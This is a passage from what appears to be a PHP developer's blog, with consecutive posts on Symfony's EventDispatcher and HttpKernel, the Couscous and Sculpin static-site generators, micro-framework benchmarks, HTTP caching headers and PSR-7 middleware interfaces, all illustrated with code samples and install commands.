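    if ('/api/articles' === $pathinfo) {
        if (in_array($method, array('GET', 'HEAD'), true)) {
            return array(
                '_route' => 'search_articles',
                '_controller' => 'Vendor\Project\Controller\ArticleController::search',
            );
        }
        $allow = array_merge($allow, array('GET', 'HEAD'));
    }

    throw new \RuntimeException(
        count($allow) > 0 ? 'Method not allowed: '.implode(', ', $allow) : 'Not found'
    );
}
```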
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR:
$eventDispatcher->addListener($eventName, $listener1, $priority);
$eventDispatcher->addListener($eventName, $listener2, $priority - 1);
$eventDispatcher->dispatch($eventName); // Calls $listener1, then $listener2
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check Event Dispatcher, then in the next articles we'll have a look at:
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides an EventDispatcher component which allows the execution of registered functions at key points in our applications.
It revolves around the following interface:
<?php
namespace Symfony\Component\EventDispatcher;
interface EventDispatcherInterface
{
/**
* @param string $eventName
* @param callable $listener
* @param int $priority High priority listeners will be executed first
*/
public function addListener($eventName, $listener, $priority = 0);
/**
* @param string $eventName
* @param Event $event
*/
public function dispatch($eventName, Event $event = null);
}
Note: This snippet is a truncated version, the actual interface has methods to add/remove/get/check listeners and subscribers (which are "auto-configured" listeners).
An implementation is provided out of the box and can be used as follows:
<?php
use Symfony\Component\EventDispatcher\EventDispatcher;
$eventDispatcher = new EventDispatcher();
$eventDispatcher->addListener('something_happened', function () {
echo "Log it\n";
}, 1);
$eventDispatcher->addListener('something_happened', function () {
echo "Save it\n";
}, 2);
$eventDispatcher->dispatch('something_happened');
This will output:
Save it
Log it
Since the second listener had a higher priority, it got executed first.
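The priority mechanism can be sketched with a minimal, framework-free dispatcher (TinyDispatcher is a made-up class, not Symfony's implementation; it collects the listeners' return values so the ordering is easy to observe):

```php
<?php
// Minimal sketch of priority-based dispatching: listeners are sorted
// by descending priority before being called.
class TinyDispatcher
{
    private $listeners = array();

    public function addListener($eventName, $listener, $priority = 0)
    {
        $this->listeners[$eventName][] = array('listener' => $listener, 'priority' => $priority);
    }

    public function dispatch($eventName)
    {
        $called = array();
        $listeners = isset($this->listeners[$eventName]) ? $this->listeners[$eventName] : array();
        // Higher priority listeners are executed first.
        usort($listeners, function ($a, $b) {
            return $b['priority'] - $a['priority'];
        });
        foreach ($listeners as $entry) {
            $called[] = call_user_func($entry['listener']);
        }

        return $called;
    }
}
```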
Note: Listeners must be a callable, for example:
- an anonymous function: $listener = function (Event $event) {};
- an array with an object and a method name: $listener = array($service, 'method');
- a fully qualified class name with a static method name: $listener = 'Vendor\Project\Service::staticMethod'.
If we want to provide some context to the listeners (parameters, etc) we can
create a sub-class of Event:
<?php
use Symfony\Component\EventDispatcher\Event;
use Symfony\Component\EventDispatcher\EventDispatcher;
class SomethingHappenedEvent extends Event
{
private $who;
private $what;
private $when;
public function __construct($who, $what)
{
$this->who = $who;
$this->what = $what;
$this->when = new \DateTime();
}
public function who()
{
return $this->who;
}
public function what()
{
return $this->what;
}
public function when()
{
return $this->when;
}
}
$eventDispatcher = new EventDispatcher();
$eventDispatcher->addListener('something_happened', function (SomethingHappenedEvent $event) {
echo "{$event->who()} was {$event->what()} at {$event->when()->format('Y/m/d H:i:s')}\n";
});
$eventDispatcher->dispatch('something_happened', new SomethingHappenedEvent('Arthur', 'hitchhiking'));
The HttpKernel component we've seen in the previous article
provides a Kernel abstract class that heavily relies on EventDispatcher.
For each key step of its execution, it dispatches the following events:
- kernel.request: gets a Request
- kernel.controller: executes a callable (also known as "Controller")
- kernel.view: converts the Controller's returned value into a Response (if necessary)
- kernel.response: returns a Response

And in case of error:

- kernel.exception: handles errors

Just before returning the Response, HttpKernel dispatches one last event:

- kernel.finish_request: clean-ups, sending emails, etc.

After the Response has been sent, we can dispatch:

- kernel.terminate: same as kernel.finish_request, except it won't slow down the rendering of the request if FastCGI is enabled

Listeners registered for kernel.request can modify the Request object.
Out of the box there's a RouterListener registered which sets the following
parameters in Request->attributes:
- _route: the name of the route that matched the Request
- _controller: a callable that will handle the Request and return a Response
- _route_params: the parameters extracted from the Request's path

An example of a custom Listener could be one that decodes JSON content and sets
it in Request->request:
<?php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class JsonRequestContentListener
{
/**
* @param GetResponseEvent $event
*/
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmitted = in_array($request->getMethod(), array('PATCH', 'POST', 'PUT'), true);
$isJson = (1 === preg_match('#application/json#', $request->headers->get('Content-Type')));
if (!$hasBeenSubmitted || !$isJson) {
    return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
    $event->setResponse(new Response('{"error":"Invalid or malformed JSON"}', 400, array('Content-Type' => 'application/json')));

    return;
}
$request->request->add($data ?: array());
}
}
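The decoding logic of that listener, isolated as a plain function (decodeJsonBody is a hypothetical name) so it can be reasoned about outside HttpKernel:

```php
<?php
// Decode a JSON request body the way the listener above does:
// only for submitting methods with a JSON Content-Type, and
// failing loudly on malformed JSON.
function decodeJsonBody($method, $contentType, $content)
{
    $hasBeenSubmitted = in_array($method, array('PATCH', 'POST', 'PUT'), true);
    $isJson = (1 === preg_match('#application/json#', (string) $contentType));
    if (!$hasBeenSubmitted || !$isJson) {
        return array();
    }
    $data = json_decode($content, true);
    if (JSON_ERROR_NONE !== json_last_error()) {
        throw new \InvalidArgumentException('Invalid or malformed JSON');
    }

    return is_array($data) ? $data : array();
}
```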
Another example would be to start a database transaction:
<?php
namespace AppBundle\EventListener;
use PommProject\Foundation\QueryManager\QueryManagerInterface;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class StartTransactionListener
{
/**
* @var QueryManagerInterface
*/
private $queryManager;
/**
* @param QueryManagerInterface $queryManager
*/
public function __construct(QueryManagerInterface $queryManager)
{
$this->queryManager = $queryManager;
}
/**
* @param GetResponseEvent $event
*/
public function onKernelRequest(GetResponseEvent $event)
{
$this->queryManager->query('START TRANSACTION');
}
}
Note: Pomm is used here as an example.
Listeners registered for kernel.controller can change the Controller that is about to be executed.
For example SensioFrameworkExtraBundle has a ControllerListener that parses
the controller annotations at this point.
Listeners registered for kernel.view can convert the Controller's returned value into a Response object.
For example SensioFrameworkExtraBundle has a TemplateListener that uses @Template
annotation: controllers only need to return an array and the listener will create
a response using Twig (it will pass the array as
Twig parameters).
Listeners registered for kernel.response can modify the Response object.
Out of the box there's a ResponseListener registered which sets some Response
headers according to the Request's ones.
Listeners registered for kernel.terminate can execute actions after the
Response has been served (if our web server uses FastCGI).
An example of a custom Listener could be one that rolls back a database transaction when running in the test environment:
<?php
namespace AppBundle\EventListener\Pomm;
use PommProject\Foundation\QueryManager\QueryManagerInterface;
use Symfony\Component\HttpKernel\Event\PostResponseEvent;
class RollbackListener
{
/**
* @var QueryManagerInterface
*/
private $queryManager;
/**
* @param QueryManagerInterface $queryManager
*/
public function __construct(QueryManagerInterface $queryManager)
{
$this->queryManager = $queryManager;
}
/**
* @param PostResponseEvent $event
*/
public function onKernelTerminate(PostResponseEvent $event)
{
$this->queryManager->query('ROLLBACK');
}
}
Note: We'll see later how to register this listener only for the test environment.
Listeners registered for kernel.exception can catch an exception and generate
an appropriate Response object.
An example of a custom Listener could be one that logs debug information and generates a 500 Response:
<?php
namespace AppBundle\EventListener;
use Psr\Log\LoggerInterface;
use Ramsey\Uuid\Uuid;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class ExceptionListener
{
/**
* @var LoggerInterface
*/
private $logger;
/**
* @param LoggerInterface $logger
*/
public function __construct(LoggerInterface $logger)
{
$this->logger = $logger;
}
/**
* @param GetResponseForExceptionEvent $event
*/
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
$token = Uuid::uuid4()->toString();
$this->logger->critical(
'Caught PHP Exception {class}: "{message}" at {file} line {line}',
array(
'class' => get_class($exception),
'message' => $exception->getMessage(),
'file' => $exception->getFile(),
'line' => $exception->getLine(),
'exception' => $exception,
'token' => $token,
)
);
$event->setResponse(new Response(
json_encode(array(
'error' => 'An error occurred, if it keeps happening please contact an administrator and provide the following token: '.$token,
)),
500,
array('Content-Type' => 'application/json'))
);
}
}
Note: Ramsey UUID is used here to provide a unique token that can be referred to.
EventDispatcher is another example of a simple yet powerful Symfony component. HttpKernel uses it to configure a standard "Symfony application", but also to allow us to change its behaviour.
In this article we've seen the basics and how it works under the hood when used by HttpKernel, but we could also create our own event and dispatch it to make our own code "open for extension, but closed for modification" (the Open/Closed principle).
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: $response = $httpKernel->handle($request);
Symfony provides many standalone libraries (also known as "Components") that help us build applications.
In this guide we'll see the main ones that allow us to build an application:
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides a HttpKernel component
which follows the HTTP protocol: it converts a Request into a Response.
It all revolves around the following interface:
<?php
namespace Symfony\Component\HttpKernel;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
interface HttpKernelInterface
{
const MASTER_REQUEST = 1;
const SUB_REQUEST = 2;
/**
* @param Request $request
* @param int $type
* @param bool $catch Whether to catch exceptions or not
*
* @return Response
*/
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true);
}
HttpKernel relies on the HttpFoundation component which mainly provides:
- Request: wraps $_GET, $_POST, $_COOKIE, $_FILES and $_SERVER
- Response: wraps header() and setcookie(), and also displays the content

Note: Global variables have the drawback of being accessible from many functions, which makes their state unpredictable (hence bugs happen, and they are hard to find/understand).
With HttpFoundation, PHP super globals shouldn't be accessed directly, but rather via the objects that wrap them (e.g. Request), which are passed around (those objects are not global).
Here's a typical usage:
$request = Request::createFromGlobals();
$response = $httpKernel->handle($request);
$response->send();
In the above example, Request will be initialized using PHP super globals.
Sometimes it can be useful to build it with our own provided values (e.g. for tests):
$uri = '/v1/items';
$method = 'POST';
$parameters = array(); // GET or POST parameters, usually left unused (use uri and content instead)
$cookies = array();
$files = array();
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode(array('name' => 'Arthur Dent'));
$request = Request::create($uri, $method, $parameters, $cookies, $files, $headers, $content);
In our application, we'll mainly extract its parameters:
$getParameter = $request->query->get('description'); // e.g. from URI `/?description=hitchhiker`
$postParameter = $request->request->get('name'); // e.g. from content `name=Arthur`
$header = $request->headers->get('Content-Type'); // e.g. from headers `Content-Type: application/x-www-form-urlencoded`
$customParameter = $request->attributes->get('_route'); // We'll see more about it in the next article
Note: Those public properties are instances of Symfony\Component\HttpFoundation\ParameterBag, except headers, which is an instance of Symfony\Component\HttpFoundation\HeaderBag.
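The ParameterBag idea can be sketched in a few lines (TinyParameterBag is a made-up name; the real class offers much more, such as all(), has() and typed getters):

```php
<?php
// Minimal sketch of a ParameterBag: a value object wrapping an array,
// returning a default when the key is missing.
class TinyParameterBag
{
    private $parameters;

    public function __construct(array $parameters = array())
    {
        $this->parameters = $parameters;
    }

    public function get($key, $default = null)
    {
        return array_key_exists($key, $this->parameters) ? $this->parameters[$key] : $default;
    }
}
```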
In our application we'll mainly build Response:
$content = json_encode(array('name' => 'Arthur Dent'));
$status = 201;
$headers = array('Content-Type' => 'application/json');
$response = new Response($content, $status, $headers);
HttpFoundation also wraps $_SESSION in a convenient Session object. This one
is however out of the scope of this series, to find more about it have a look at
Symfony Session Introduction.
Let's create a small Hello World example:
<?php
use Symfony\Component\HttpKernel\HttpKernelInterface;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class HelloWorldHttpKernel implements HttpKernelInterface
{
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true)
{
$name = $request->query->get('name', 'World');
return new Response("Hello $name!", 200);
}
}
$httpKernel = new HelloWorldHttpKernel();
$request = Request::createFromGlobals();
$response = $httpKernel->handle($request);
$response->send();
So we can get the following:
- with the / URL, we get Hello World!
- with the /?name=Arthur URL, we get Hello Arthur!

Symfony provides a simple yet powerful component allowing us to follow the HTTP protocol.
In this article we've seen the basics and how it works under the hood, but in
an actual application we don't necessarily need to create our own implementation
of HttpKernelInterface.
Indeed there's a Symfony\Component\HttpKernel\Kernel abstract class that can
be used out of the box. It provides many features that we'll explore in the next
articles:
TL;DR: Links I tweeted during 2015
It's funny how old principles are still useful today. In 2015, the most important ones I've learned are the following:
It was a year full of links, so here they are!
The first step is to get the tool:
curl -OS http://couscous.io/couscous.phar
sudo mv ./couscous.phar /usr/local/bin/couscous
Then we need to create a couscous.yml file at the root of our Github Project:
template:
url: https://github.com/CouscousPHP/Template-Light.git
baseUrl: http://<user-name>.github.io/<project-name>
title: <project-title>
subTitle: <project-short-description>
github:
user: <user-name>
repo: <project-name>
menu:
items:
home:
text: Home
relativeUrl:
<article-name>:
text: <article-title>
relativeUrl: <article-filename>.html
Of course <user-name>, <project-name>, <project-title>, <project-short-description>,
<article-name>, <article-title> and <article-filename> need to be replaced accordingly.
Couscous is going to automatically use *.md files found in the project (e.g. README.md).
The menu section in couscous.yml will generate a handy menu. Usually home
as well as the rest of the documentation is listed here, for example:
menu:
items:
home:
text: Home
relativeUrl:
installation:
text: Installation
relativeUrl: doc/01-installation.html
compatibility:
text: Compatibility
relativeUrl: doc/02-compatibility.html
benchmark:
text: Benchmark
relativeUrl: doc/03-benchmark.html
To generate the documentation, simply run:
couscous preview
This will launch a local server, allowing us to preview the documentation at http://localhost:8000.
Once satisfied, we can run:
couscous deploy
This will generate the definitive HTML, commit them in a gh-page branch and push
it, making it available online.
Couscous provides the possibility to host nice documentation for Github projects, thanks to its simplicity.
Both tools are really similar:
However Sculpin has better support, and its author is a member of the PHP FIG. Let's see how it works.
Github provides a service allowing people to host static websites: Pages. The idea is simple: HTML files pushed to a repository named <username>.github.io are served online at that address.

We can create a _sculpin directory at the root of the project, install inside
it our Sculpin application with the page sources and finally generate the HTML
files back in the root directory.
Installing Sculpin is very easy as a PHAR is provided:
curl -O https://download.sculpin.io/sculpin.phar
php sculpin.phar install
php sculpin.phar generate --watch --server
The generate command will convert all markdown files into HTML, and the --server
option will launch a local web server allowing us to preview the website in the browser.
Articles are written in the source/_posts directory and their names must be
prefixed with their publication date (e.g. 2016-01-25-my-article.md).
Every page starts with front matter:
---
layout: post
title: My Article
tags:
- essay
---
The rest of the file is in standard markdown and will constitute the content of the page.
Once happy with the changes, we can generate the final HTML:
php sculpin.phar generate --env=prod
The files will be located in output_prod. If we want to use Github Pages as
described above, we simply need to move those files to the root directory:
cp -r output_prod/* ../
Then we simply need to commit all the changes and push.
Sculpin is quite simple to use: write some markdown files and let it generate HTML files out of it. It uses Symfony and Twig behind the scene making it really easy to extend.
Note: Migrating from Carew was a simple task. In my case it required:

- removing all link function usages and using markdown links instead
- configuring permalink to :year/:month/:day/:filename.html in app/config/sculpin_kernel.yml to keep URLs backward compatible
TL;DR: Symfony has always been able to be used as a micro framework. For a more "add what you need", micro-framework-like spirit, use the Empty Edition and the MicroFrameworkBundle.
There are many definitions out there to qualify a framework as being "micro"; among them, the following criteria often appear:
Is Symfony a micro framework as well? Let's find out.
Note: To know more about how to determine if a framework is micro, read Igor Wiedler's article: How heavy is Silex?.
While "Hello World" examples rarely reflect real world applications, it's going to be good enough to serve the purpose of this article: getting a good measure of Symfony's API, LOC, dependencies and footprint.
Since dependencies and footprint are easy to measure, we're going to rely on them. However, all benchmarks are relative to the computer that executes them, so we need a point of reference: a flat PHP "Hello World" application:
<?php
// index.php
echo 'Hello World';
Let's run the benchmark:
php -S localhost:2501 &
ab -c 10 -t 10 'http://localhost:2501/index.php'
killall php
Result: 6,915.03 Requests per second.
To get the Standard Edition, we can use composer:
composer create-project symfony/framework-standard-edition
cd framework-standard-edition
Since the Standard Edition follows a "solve 80% of use cases out of the box" philosophy, it's almost ready; we just need to tweak the given controller:
<?php
// src/AppBundle/Controller/DefaultController.php
namespace AppBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class DefaultController extends Controller
{
/**
* @Route("/", name="homepage")
*/
public function indexAction(Request $request)
{
return new Response('Hello World');
}
}
Let's run the benchmark:
SYMFONY_ENV=prod composer update -o --no-dev
php -S localhost:2502 -t web &
ab -c 10 -t 10 'http://localhost:2502/app.php'
killall php
Result: 134.23 Requests per second.
We're also going to list the dependencies:
tree -d -L 2 vendor/ | grep ' ' | wc -l
tree -d -L 2 vendor/ | grep ' ' | wc -l
We get 28 + 1, in which the symfony package has to be counted as the 44
packages it replaces: 72 in total.
So to sum up:
As stated above, the Standard Edition has a "solve 80% of use cases out of the box" philosophy, so it comes with many dependencies that might not fit our needs. Micro frameworks usually follow an "add what you need" philosophy, which is exactly what the Empty Edition is all about.
Let's see if we can get more micro with it:
composer create-project gnugat/symfony-empty-edition
cd symfony-empty-edition
The first step is to create a controller:
<?php
// src/AppBundle/Controller/HelloController.php
namespace AppBundle\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class HelloController
{
public function world(Request $request)
{
return new Response('Hello World');
}
}
Then we register it as a service:
# app/config/services/controller.yml
services:
app.hello_controller:
class: AppBundle\Controller\HelloController
Finally we register the route:
# app/config/routings/app.yml
hello_world:
path: /
defaults:
_controller: app.hello_controller:world
methods:
- GET
Let's run the benchmark:
composer update -o --no-dev
php -S localhost:2503 -t web &
ab -c 10 -t 10 'http://localhost:2503/app.php'
killall php
Result: 524.53 Requests per second.
We're also going to list the dependencies:
tree -d -L 2 vendor/ | grep ' ' | wc -l
tree -d -L 2 vendor/ | grep ' ' | wc -l
We get 6 + 23 = 29.
So to sum up:
By reducing the number of dependencies, we also drastically reduced the framework footprint. This is not surprising as:
Can we go further? Certainly: the FrameworkBundle also follows the "solve 80% of use cases out of the box" philosophy (it includes Forms, Security, Templating, Translation, Assets, annotations, etc).
By using a MicroFrameworkBundle that provides the strict minimum and follows
the micro-framework philosophy of "add what you need", we can surely reduce the
number of dependencies further. Hence gnugat/micro-framework-bundle:
composer require 'gnugat/micro-framework-bundle'
composer remove 'symfony/framework-bundle'
Then we need to swap the bundle in the registration:
<?php
// app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Gnugat\MicroFrameworkBundle\GnugatMicroFrameworkBundle(),
new AppBundle\AppBundle(),
);
}
public function getRootDir()
{
return __DIR__;
}
public function getCacheDir()
{
return dirname(__DIR__).'/var/cache/'.$this->environment;
}
public function getLogDir()
{
return dirname(__DIR__).'/var/logs';
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load($this->rootDir.'/config/config_'.$this->environment.'.yml');
}
}
Finally we can get rid of some configuration:
# app/config/config.yml
imports:
- { resource: parameters.yml }
- { resource: services/ }
Let's benchmark our trimmed application:
rm -rf var/*
composer update -o --no-dev
php -S localhost:2504 -t web &
ab -c 10 -t 10 'http://localhost:2504/app.php'
killall php
Result: 872.83 Requests per second.
We're also going to list the dependencies:
tree -d -L 2 vendor/ | grep ' ' | wc -l
tree -d -L 2 vendor/ | grep ' ' | wc -l
We get 3 + 13 = 16.
So to sum up:
Symfony has always been able to be used as a micro framework.
The Standard Edition and the FrameworkBundle follow a "solve 80% of use cases out of the box" philosophy, which is better for newcomers.
However, for experienced developers looking for the "add what you need" philosophy that micro-frameworks usually follow, the Empty Edition and the MicroFrameworkBundle can be a viable alternative (they are slimmer in terms of dependencies, and faster).
Note: At the time of writing, MicroFrameworkBundle is still under development (version
0.1.0). Use it at your own risk and contribute to it :) .
TL;DR: Enable HTTP cache by setting one of the following header in your Responses:
Cache-Control, Expires, Last-Modified or Etag.
The HTTP protocol specifies how to cache Responses:
The following actors are involved:
- AppCache, embedded in Symfony

Its advantages:
Its drawbacks:
A Response can be cached if the incoming Request complies with the following rules:

- it uses the GET or HEAD method
- the values of the headers listed in Vary are the same
- it has no Authorization header

For example, the following Request can produce cacheable Responses:
GET /v1/items?page=1
Accept: application/json
Vary: Accept
Sending the following Request would produce a different cacheable Response:
GET /v1/items?page=1
Accept: text/html
Vary: Accept
To be cacheable, a Response should also have one of the headers described in the next section.
Note: Headers specified in Vary will have their values stored in the Reverse Proxy. Sensitive data (e.g. API keys, passwords, etc) shouldn't be used as a cache key.
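Conceptually, the Reverse Proxy builds its cache key from the request target plus the values of every header listed in Vary. A hypothetical sketch (cacheKey is a made-up helper, not from any library):

```php
<?php
// Build a cache key from the request target and the values of the
// headers named by the Response's Vary header: requests that differ
// on those headers get different cache entries.
function cacheKey($method, $uri, array $varyHeaders, array $requestHeaders)
{
    $parts = array($method, $uri);
    foreach ($varyHeaders as $name) {
        $value = isset($requestHeaders[$name]) ? $requestHeaders[$name] : '';
        $parts[] = strtolower($name).'='.$value;
    }

    return implode('|', $parts);
}
```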
HTTP cache provides the possibility to choose different strategies:
If a Response can be safely cached for a fixed period of time (e.g. 10 minutes),
use Cache-Control HTTP Header:
HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Type: application/json
{"id":42,"name":"Arthur Dent"}
Note: the Reverse Proxy will add a header to the Response indicating its age:
HTTP/1.1 200 OK
Age: 23
Cache-Control: max-age=600
Content-Type: application/json

{"id":42,"name":"Arthur Dent"}
If a Response can be safely cached until a known date (e.g. the 30th of October 1998,
at 2:19pm), use Expires HTTP Header:
HTTP/1.1 200 OK
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Content-Type: application/json
{"id":42,"name":"Arthur Dent"}
Note: the HTTP date format is required.
The Reverse Proxy can serve a stale cached copy and then asynchronously check with
the Application whether it needs to be refreshed, using the Last-Modified (a date) and/or
ETag (a hash) HTTP Headers:
HTTP/1.1 200 OK
Last-Modified: Tue, 08 Sep 2015 13:35:23 GMT
ETag: a3e455afd
Content-Type: application/json
{"id":42,"name":"Arthur Dent"}
Note: the Reverse Proxy will then send requests with If-Modified-Since (a date) and/or If-None-Match (a hash) headers:

GET /v1/users/42 HTTP/1.1
If-Modified-Since: Tue, 08 Sep 2015 13:35:23 GMT
If-None-Match: a3e455afd
Accept: application/json

If the Response shouldn't be updated, the Server should return a 304 Not Modified Response.
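The server-side validation check can be sketched as follows (shouldReturnNotModified is a hypothetical helper, not from any library):

```php
<?php
// Decide whether a 304 Not Modified can be returned: the ETag
// comparison wins when both sides provide one, otherwise fall back
// to the Last-Modified date comparison.
function shouldReturnNotModified(
    $ifNoneMatch, $etag,
    $ifModifiedSince, $lastModifiedTimestamp
) {
    if (null !== $ifNoneMatch && null !== $etag) {
        return $ifNoneMatch === $etag;
    }
    if (null !== $ifModifiedSince) {
        return $lastModifiedTimestamp <= strtotime($ifModifiedSince);
    }

    return false;
}
```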
Keep in mind that Cache-Control header can be used by both the Reverse Proxy
and the Client (e.g. a browser) to cache the Response.
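The freshness decision driven by Cache-Control can be sketched with two hypothetical helpers (parseCacheControl and isFresh are made-up names, not from any library):

```php
<?php
// Parse Cache-Control directives into an array, then decide whether
// a cached copy of a given age is still fresh.
function parseCacheControl($header)
{
    $directives = array();
    foreach (explode(',', $header) as $part) {
        $pieces = explode('=', trim($part), 2);
        $directives[$pieces[0]] = isset($pieces[1]) ? $pieces[1] : true;
    }

    return $directives;
}

function isFresh(array $directives, $ageInSeconds, $sharedCache = false)
{
    if (isset($directives['no-store']) || isset($directives['no-cache'])) {
        return false;
    }
    // s-maxage overrides max-age for shared (Reverse Proxy) caches.
    if ($sharedCache && isset($directives['s-maxage'])) {
        return $ageInSeconds < (int) $directives['s-maxage'];
    }
    if (isset($directives['max-age'])) {
        return $ageInSeconds < (int) $directives['max-age'];
    }

    return false;
}
```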
- max-age=[seconds]: how long the Response should be cached
- s-maxage=[seconds]: same as max-age, but for the Reverse Proxy only
- private: only the Client can cache (default for authenticated Responses)
- public: the Reverse Proxy can also cache (for authenticated Responses)
- no-cache: refresh the cached copy (but still cache it)
- no-store: the Response should not be cached anywhere (e.g. because it contains sensitive data)
- must-revalidate: refresh the cached copy if it is stale
- proxy-revalidate: same as must-revalidate, but for the Reverse Proxy only

The date MUST be represented in Greenwich Mean Time (GMT), with the following format: D, d M Y H:i:s GMT
- D: a textual representation of a day, three letters (Mon to Sun)
- d: day of the month, 2 digits with leading zeros (01 to 31)
- M: a short textual representation of a month, three letters (Jan to Dec)
- Y: a full numeric representation of a year, 4 digits (e.g. 1999, 2003)
- H: 24-hour format of an hour with leading zeros (00 to 23)
- i: minutes with leading zeros (00 to 59)
- s: seconds with leading zeros (00 to 59)

The Expires header is usually used to cache responses for applications which are
updated on a regular date (synchronization with a source of the data).
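The HTTP date format above maps directly onto PHP's date specifiers; gmdate() already renders in GMT, so only the literal suffix needs to be appended (httpDate is a made-up helper):

```php
<?php
// Format a Unix timestamp as an HTTP-date (always GMT).
function httpDate($timestamp)
{
    return gmdate('D, d M Y H:i:s', $timestamp).' GMT';
}
```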
The Last-Modified header is used when the data has an updated_at field we can
rely on.
The Etag header is used when we can safely create a hash of the response and compare
it with the cached copy.
Note: With Last-Modified and Etag, the Reverse Proxy serves the cached Response first, and then checks asynchronously with the application whether it is stale.
Finally the Cache-Control header is usually used in any other situation.
More readings about HTTP Cache can be found here:
The main package, psr/http-message, has a few implementations but mainly it comes down to:
The standard interfaces leave little room for implementation details by forcing immutability and streams. They mainly leave freedom in the way implementations are constructed, though.
Note: Beyond that, Diactoros and Guzzle still differ slightly.
It's a pity we didn't end up directly with standard value objects, but we'll have to make do with those interfaces for now. So, what's the next step for PSR-7?
Middlewares have been around for a while now (in PHP as well as in other languages). The idea is to have:
Let's take Symfony's HttpKernelInterface as an example:
<?php
namespace Symfony\Component\HttpKernel;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
interface HttpKernelInterface
{
const MASTER_REQUEST = 1;
const SUB_REQUEST = 2;
// @return Response
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = false);
}
Symfony provides a HttpKernel implementation to take care of creating a
Response for the given Request. Middlewares would wrap the call to
HttpKernel#handle with their own logic, which could be:
- content negotiation based on the Accept header

Here's an example that always rolls back database transactions, with Pomm Foundation.
<?php
namespace Acme\Fortune\Bridge\HttpKernel;
use PommProject\Foundation\QueryManager\QueryManagerInterface;
use Symfony\Component\HttpKernel\HttpKernelInterface;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class RollbackKernel implements HttpKernelInterface
{
private $httpKernel;
private $queryManager;
public function __construct(HttpKernelInterface $httpKernel, QueryManagerInterface $queryManager)
{
$this->httpKernel = $httpKernel;
$this->queryManager = $queryManager;
}
// @return Response
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = false)
{
$this->queryManager->query('START TRANSACTION');
$response = $this->httpKernel->handle($request, $type, $catch);
$this->queryManager->query('ROLLBACK');
return $response;
}
}
The Stack initiative provides visibility on those HttpKernelInterface middlewares.
Note: Stack is inspired by Ruby's rack.
So the next step would be to provide a standard interface to allow PSR-7 middlewares. Of course such a standard isn't straightforward, as there are many ways to create middlewares.
Similar to HttpKernelInterface, this one just receives a RequestInterface
and returns a ResponseInterface:
<?php
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
interface RequestHandler
{
// @return ResponseInterface
public function handleRequest(RequestInterface $request);
}
Names can be debated, but the point here is that calling the next middleware is up to the implementation (it can use dependency injection, for example).
Httplug is a good example using this implementation.
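To make the first style concrete, here's a minimal, self-contained sketch of a middleware that receives the next handler via constructor injection and decides itself when to call it. To keep it runnable without the PSR-7 packages, the request and response are stubbed as plain strings; only the wiring matters here, and all class names are hypothetical.

```php
<?php
// The shared interface, with strings standing in for PSR-7 messages.
interface RequestHandler
{
    // @return string (stands in for ResponseInterface)
    public function handleRequest($request);
}

// Innermost handler: produces the actual response.
class AppRequestHandler implements RequestHandler
{
    public function handleRequest($request)
    {
        return 'response for '.$request;
    }
}

// Middleware: receives the next handler through its constructor and only
// delegates on a cache miss.
class CacheRequestHandler implements RequestHandler
{
    private $next;
    private $cache = array();

    public function __construct(RequestHandler $next)
    {
        $this->next = $next;
    }

    public function handleRequest($request)
    {
        if (!isset($this->cache[$request])) {
            $this->cache[$request] = $this->next->handleRequest($request);
        }

        return $this->cache[$request];
    }
}

$handler = new CacheRequestHandler(new AppRequestHandler());
echo $handler->handleRequest('/quotes'); // response for /quotes
```

The second call with the same request would come straight from the cache: the middleware fully controls whether the next handler runs at all.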
Another interface commonly encountered forces the way of managing the next middleware:
<?php
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
interface RequestHandler
{
// @return ResponseInterface
public function handleRequest(
RequestInterface $request,
ResponseInterface $response,
RequestHandler $next = null
);
}
This one requires the response to be passed as an argument, as well as the next middleware.
A good example using this implementation would be Zend Stratigility.
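The calling convention of this second style can be sketched in a few lines. The names below are hypothetical and PSR-7 messages are again stubbed as strings, since the point is only how the next middleware travels through the signature:

```php
<?php
// Second style: request, response AND the next middleware are all arguments.
interface PipelineHandler
{
    public function handleRequest($request, $response, PipelineHandler $next = null);
}

// Middleware: normalises the path, then delegates if there is a next handler.
class TrimSlashHandler implements PipelineHandler
{
    public function handleRequest($request, $response, PipelineHandler $next = null)
    {
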